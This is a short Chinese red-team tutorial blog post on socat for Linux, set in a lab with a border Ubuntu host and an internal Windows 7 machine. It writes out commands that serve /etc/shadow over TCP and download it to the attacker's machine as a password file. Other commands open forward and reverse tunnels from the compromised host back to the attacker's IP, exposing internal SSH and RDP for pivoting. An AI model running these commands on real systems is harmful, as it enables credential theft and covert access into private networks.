socat在Linux下的使用

目录

0x01 socat介绍

0x02 socat进行文件传输

0x03 socat正向端口转发

0x04 socat反向端口转发

注：

边界机器 Ubuntu 192.168.222.177

内网机器 win7 192.168.222.137

0x01 socat介绍

socat我们在前面也已经介绍过了，之前说的是Windows下的利用，如果没有看到的朋友请移步【socat在Windows下的使用】，socat本身就是在Linux下使用的，非要将它放到Windows下使用难免会有水土不服嘛，这次就回到Linux上来进行socat的使用。

安装的话，我们可以直接下载安装的，如果你非要去手动编译的话，就自行去研究吧。

apt-get install socat

完成后来检验一下是否安装成功

socat -h

0x02 socat进行文件传输

首先，我们去边界机器执行

socat -u /etc/shadow TCP4-LISTEN:55,reuseaddr

然后回到我们本机来下载，这里我本机是Windows的，不过不影响

socat.exe -u TCP4:192.168.222.177:55 OPEN:mima.txt,create

跟之前一样，在哪里执行create的，文件就在哪里

0x03 socat正向端口转发

这里，我们通过边界主机去访问内网的主机

首先我们去边界主机执行命令，将来自外部1000的流量全部都转发到内网机器的3389端口上

socat TCP4-LISTEN:1000,fork TCP4:192.168.222.137:3389

然后我们到本地主机上连接

0x04 socat反向端口转发

首先，我们在本地执行监听

socat.exe tcp-listen:1000 tcp-listen:1001

然后，我们在边缘机器上执行命令

注：10.1.135.96是我本地主机的IP

socat tcp4-connect:10.1.135.96:1000 tcp4:127.0.0.1:22

然后本地连接ssh

当然，直接连接内网的机器也是可以的

socat tcp4-connect:10.1.135.96:1000 tcp4:192.168.222.137:3389

然后回到本地连接远程桌面

注意，整个过程一定要一气呵成，如果中间出错，本地的监听也需要重新执行，否则将会一直报错，如果出现问题，多尝试几次就好

文章首发公众号：无心的梦呓(wuxinmengyi)

这是一个记录红队学习、信安笔记，个人成长的公众号

扫码关注即可